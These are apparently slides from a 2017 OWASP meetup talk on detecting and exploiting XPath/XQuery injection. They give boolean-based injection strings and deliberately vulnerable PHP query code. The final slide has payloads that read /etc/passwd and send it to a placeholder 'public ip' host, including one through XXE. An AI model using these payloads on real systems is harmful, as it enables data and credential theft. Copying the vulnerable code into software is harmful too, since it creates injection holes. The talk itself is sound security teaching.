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"Detection & exploitation of Xpath/Xquery Injections", Boris Savkov

OWASP Moscow
December 04, 2017

"Detection & exploitation of Xpath/Xquery Injections", Boris Savkov

OWASP Russia Meetup #3

OWASP Moscow

December 04, 2017

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  1. What will be discussed today? • Xpath/XQuery • Boolean-based •

    Time-based • Request-based • Union-based • Xquery DB • XXE in XQuery
  2. XPath XPath is used to navigate through elements and attributes

    in an XML document. XPath became a W3C Recommendation 16. November 1999. XPath is a major element in W3C's XSLT standard - and XQuery and XPointer are both built on XPath expressions Standards: 1.0, 2.0, 3.0.
  3. XPath examples /.../node[@attribute=value]/.../text() • child::text() • child::node() • attribute::node() •

    child::processing-instruction() • child::comment() • child::namespace-uri() • name(/…/node)
  4. XPath examples <root> <?xml-stylesheet type="text/css" href="mystyle.css" ?> <namespace xmlns="http://www.w3.org/1999/xhtml"/> <News>

    <current_news> <page ID="1"> <!-- this is comment1 --> <info>British people are my only 'boss' on EU reform, says David Cameron</info> </page> <page ID="2"> <!-- this is comment1 --> <info>BoE says part of banking payment system down</info> </page> </current_news> </News> </root> /root/News/current_news/page[@ID='1']/info/ //page[1]//text() /*[1]/*[3]/*[1]/*[1]/*[1]/text()
  5. XQuery XQuery is to XML what SQL is to database

    tables. XQuery 1.0 became a W3C Recommendation January 23, 2007. XQuery is designed to query XML data - not just XML files, but anything that can appear as XML, including databases. Standards: 1.0, 3.0.
  6. XQuery examples <root> <?xml-stylesheet type="text/css" href="mystyle.css" ?> <namespace xmlns="http://www.w3.org/1999/xhtml"/> <News>

    <current_news> <page ID="1"> <!-- this is comment1 --> <info>British people are my only 'boss' on EU reform, says David Cameron</info> </page> <page ID="2"> <!-- this is comment1 --> <info>BoE says part of banking payment system down</info> </page> </current_news> </News> </root> for $i in doc("examples/example.xml")//page[@ID="1"]/info/text() return <h3> {$i} </h3>
  7. Boolean-based •count() • string-length() • substring(,,) 1'and count(/*[1])=1 and '1'='1

    1'and string-length(name(/*[1]))=4 and '1'='1 1'and substring(name(/*[1]),1,'r')=1 and '1'='1
  8. XML document <Root> <News ID="1"> <info>British people are my only

    'boss' on EU reform, says David Cameron</info> </News> <News ID="2"> <info>BoE says part of banking payment system down</info> </News> <News ID="3"> <info>Current exchange rate US DOLLAR (USD) - ≤50 RUSSIAN RUBLE (RUB)</info> </News> </Root>
  9. Vulnerable code public function select($param) { $this->session->execute("open ".$this->database); $input =

    'for $i in doc("tests/news.xml")//News[@ID="'.$param.'"]'. '/info/text() return <h3> {$i} </h3>'; $query = $this->session->query($input); while($query->more()) { print $query->next()."\n"; } $query->close(); }
  10. XML document <Root> <Users> <UID>18923172</UID> <FirstName>Arnold</FirstName> <LastName>Baker</LastName> <UserName>ABaker</UserName> <Password>53282c05d16f28057602d1253757c289</Password> <Type>Admin</Type>

    </Users> <Users> <UID>94203127</UID> <FirstName>Peter</FirstName> <LastName>Pan</LastName> <UserName>PPan</UserName> <Password>5f276221c0860f39e17846f2c29d507e</Password> <Type>User</Type> </Users> <Users> <UID>57394309</UID> <FirstName>Gandalf</FirstName> <LastName>the Grey</LastName> <UserName>Mithrandir</UserName> <Password>c5f7d86f237453de41c38a7d886c5a9c</Password> <Type>User</Type> </Users> </Root>
  11. Vulnerable code public function select($uid, $username) { $this->session->execute("open ".$this->database); $input

    = 'doc("tests/users.xml")//Users[./UserName="'.$username.'"]/*[name()="UID"]/text()'; $query = $this->session->query($input); if($query->next() === $uid){ $query->close(); $input = 'for $i in doc("tests/users.xml")//Users[./UID="'.$uid.'"]'. '/*[name()="FirstName" or name()="LastName"]/text() return <h3> {$i} </h3>'; $query = $this->session->query($input); while($query->more()) { print $query->next()."\n"; } } $query->close(); }
  12. Remarks • Doesn't work in Sedna • XXE with doc

    doc(concat("Your public ip",encode-for-uri(doc("Your public ip/XXE.xml")))) • unparsed-text doc(concat("Your public ip",encode-for-uri(unparsed-text("/etc/passwd")))) • XXE and BaseX doc(concat("",encode-for-uri(doc("<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE input [<!ELEMENT input (#PCDATA)><!ENTITY c SYSTEM '/etc/passwd'>]><input>&amp;c;</input> "))))